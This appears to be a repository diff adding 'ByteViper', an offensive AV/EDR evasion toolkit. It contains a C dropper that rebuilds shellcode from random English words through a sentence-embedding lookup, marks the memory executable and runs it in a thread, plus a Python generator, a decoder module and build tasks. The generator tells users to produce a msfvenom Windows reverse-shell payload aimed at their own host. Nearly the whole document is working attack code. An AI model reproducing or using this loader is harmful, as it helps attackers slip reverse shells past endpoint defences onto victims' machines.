AV/EDR Evasion using AI driven payload Obfuscation

techniques/AI_Driven_Payload_Obfuscation/ByteViper.cpp

@@ -0,0 +1,77 @@
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "C:\\mingw64\\opt\\include\\python3.11\\Python.h"
+
+/* 
+
+Example paylod that is taken from payload-generator. Note: This is not a working payload, its just for representational purposes.
+
+unsigned char *eng_words[] = {"governessdom","yggdrasil","fala","steatorrhoea","grandee","kathryn","lamping","strutting""fauvism"};
+
+*/
+
+// Your payload goes below
+unsigned char *eng_words[] = <Your payload with curly brackets>
+
+int main(void) {
+
+	void * payload_mem;
+	BOOL rv;
+	HANDLE th;
+    DWORD oldprotect = 0;
+
+	rv = VirtualProtect(eng_words, sizeof(eng_words), PAGE_EXECUTE_READWRITE, &oldprotect);
+
+ 	Py_Initialize();
+	PyObject *name, *func, *load_module, *args, *callfunc;
+
+	printf("\nConnecting to AI...\n");
+
+	name = PyUnicode_FromString((char*)"payload");
+	load_module = PyImport_Import(name);
+	func = PyObject_GetAttrString(load_module,(char*)"getopcode");
+
+	void *startPtr = &eng_words[0];
+	void *currentPointer = &eng_words[0];
+	unsigned char* opc;
+	char* token;
+	unsigned char result;
+	int arr_count = sizeof(eng_words)/sizeof(eng_words[0]);
+
+	printf("Fetching Payload! Hold on to your butts...\n");
+
+	for (int count=0; count < arr_count; count++){
+		args = PyTuple_Pack(1, PyUnicode_FromString(eng_words[count]));
+		callfunc = PyObject_CallObject(func, args);
+
+		opc = _PyUnicode_AsString(callfunc);
+		token = strtok(opc, "|");
+
+		while(token != NULL) {
+			result = (unsigned char)strtol(token, NULL, 16);
+			RtlMoveMemory(currentPointer, &result, sizeof(result));
+			currentPointer = currentPointer + sizeof(result);
+			token = strtok(NULL, "|");
+		}
+	}
+
+	unsigned char null_byte = {0x00};
+	RtlMoveMemory(currentPointer, &null_byte, sizeof(null_byte));
+	Py_Finalize();
+
+	printf("Executing Payload...Boom\n");
+
+	if ( rv != 0 ) {
+			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) startPtr, 0, 0, 0);
+			DWORD result = WaitForSingleObject(th, -1);
+			if (result == WAIT_FAILED) {
+ 			   DWORD error = GetLastError();
+			   printf("%d", error);
+			}
+	}
+
+	printf("Exiting...\n");
+	return 0;
+}

techniques/AI_Driven_Payload_Obfuscation/payload-generator.py

@@ -0,0 +1,71 @@
+import subprocess
+import importlib
+
+packages = ['pandas','sentence_transformers', 'pickle', 'capstone', 'random_word', 'termcolor', 'Pyfiglet']
+
+for package in packages:
+  try:
+      importlib.import_module(package)
+  except ImportError:
+      subprocess.run(['python', '-m', 'pip', 'install', package, '-q', '--no-input', '--no-python-version-warning'])
+
+import pyfiglet
+
+pyfiglet.print_figlet("Byte", font="poison",colors="red", justify="center")
+pyfiglet.print_figlet("Viper", font="poison",colors="green", justify="center")
+
+import pandas as pd
+from sentence_transformers import SentenceTransformer, util
+import torch
+import pickle
+from random_word import RandomWords
+from capstone import *
+
+print("This is a payload generator created by Byte Viper AI engine.\n")
+print("It converts raw hex code payload (for example msf venom) to its mathematical representations in vectors using a pre-trained machine-learning model\n\n")
+print("*******INSTRUCTIONS START:*******\n")
+print("1. Create a working payload. For instance, msf venom payload would be\n")
+print("\"msfvenom  -p x64 --platform windows -p windows/x64/shell_reverse_tcp lhost=<your host ipv4> lport=<your port> -f c\"\n")
+print("You would get something like \"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc0\\x00\\x00\\x00\\x41\\x51\\x41\\x50.....\"\n")
+print("Remove all \\x and \" so that you are left with fc4883e4f0e8c000000041514150....\n")
+print("Use this as your input next\n")
+print("2. You would receive the AI generated payload which you embed it in your code\n")
+print("3. A pkl file would be created that hold the vectors\n")
+print("4. Place this file, in the same path, along with your dropper binary\n")
+print("5. Place payload.py, in the same path, along with your dropper\n\n")
+print("*******INSTRUCTIONS END*******\n")
+
+hex_bytes = input('Enter hex values of your payload (No "0x" or "\\x" format, just plain hex values). Example: 55488b05b8130000:\n\n')
+print("Creating vectors. Please be patient...\n\n")
+bytecode = bytes.fromhex(hex_bytes)
+cs_instance = Cs(CS_ARCH_X86, CS_MODE_64)
+
+df_dataset = pd.DataFrame(columns=['English','Opcode'])
+
+eng_list = []
+op_list = []
+
+for instruction in cs_instance.disasm(bytecode, 0x1000):
+    opcode_hex = ','.join(f"0x{byte:02x}" for byte in instruction.bytes)
+    eng_word = RandomWords().get_random_word()
+    op_list.append(opcode_hex)
+    eng_list.append(eng_word)
+
+
+df_dataset['English'] = eng_list
+df_dataset['Opcode'] = op_list
+
+model_name = 'nq-distilbert-base-v1'
+model = SentenceTransformer(model_name)
+
+df_dataset['embedding'] = (df_dataset['English'].astype(str)).apply(lambda x: model.encode(x, convert_to_tensor=True, normalize_embeddings=True))
+s = '","'.join(df_dataset["English"])
+df_dataset = df_dataset.drop('English',axis=1)
+df_dataset.sample(frac=1)
+df_dataset.to_pickle('opcode_embeddings.pkl')
+
+print("Copy payload exactly in your C code:\n\n")
+print('{"' + s + '"}\n\n')
+print("There is a pkl file created with the name \'opcode_embeddings.pkl\'.\nPlace this file, in the same path, as your dropper:\n\n")
+print("Also, place payload.py, in the same path, along with your dropper\n")
+print("Payload generation complete!\n\n")

techniques/AI_Driven_Payload_Obfuscation/payload.py

@@ -0,0 +1,29 @@
+import subprocess
+import importlib
+
+packages = ['sentence_transformers', 'pickle', 'termcolor', 'Pyfiglet']
+
+for package in packages:
+  try:
+      importlib.import_module(package)
+  except ImportError:
+      subprocess.run(['python', '-m', 'pip', 'install', package, '-q', '--no-input', '--no-python-version-warning'])
+
+import pyfiglet
+
+pyfiglet.print_figlet("Byte", font="poison",colors="red", justify="center")
+pyfiglet.print_figlet("Viper", font="poison",colors="green", justify="center")
+
+from sentence_transformers import SentenceTransformer, util
+import pickle
+
+model_name = 'nq-distilbert-base-v1'
+model = SentenceTransformer(model_name)
+
+with open('opcode_embeddings.pkl', 'rb') as pkl:
+    df_trained = pickle.load(pkl)
+
+def getopcode(opcode):
+    saved_embeddings = list(df_trained['embedding'])
+    hits = util.semantic_search(model.encode(opcode, convert_to_tensor=True), saved_embeddings, top_k=1)
+    return str(df_trained.at[hits[0][0]['corpus_id'], 'Opcode']).replace(',','|')

techniques/AI_Driven_Payload_Obfuscation/tasks.json

@@ -0,0 +1,57 @@
+{
+    "tasks": [
+        {
+            "type": "cppbuild",
+            "label": "C/C++: g++.exe build active file",
+            "command": "C:\\mingw64\\bin\\gcc.exe",
+            "args": [
+                "-fdiagnostics-color=always",
+                "-fpermissive",
+                "-Wnarrowing",
+                "-IC:\\Progra~1\\Python311\\include\\",
+                "-LC:\\Progra~1\\Python311\\libs\\",
+                "-g",
+                "-m64",
+                "${file}",
+                "-lpython311",
+                "-O0",
+                "-o",
+                "${fileDirname}\\${fileBasenameNoExtension}.exe",
+                "-masm=intel"
+                "-s"
+            ],
+            "options": {
+                "cwd": "${fileDirname}"
+            },
+            "problemMatcher": [
+                "$gcc"
+            ],
+            "group": {
+                "kind": "build",
+                "isDefault": true
+            },
+            "detail": "Task generated by Debugger."
+        },
+        {
+            "type": "cppbuild",
+            "label": "C/C++: cl.exe build active file",
+            "command": "cl.exe",
+            "args": [
+                "/Zi",
+                "/EHsc",
+                "/nologo",
+                "/Fe${fileDirname}\\${fileBasenameNoExtension}.exe",
+                "${file}"
+            ],
+            "options": {
+                "cwd": "${fileDirname}"
+            },
+            "problemMatcher": [
+                "$msCompile"
+            ],
+            "group": "build",
+            "detail": "Task generated by Debugger."
+        }
+    ],
+    "version": "2.0.0"
+}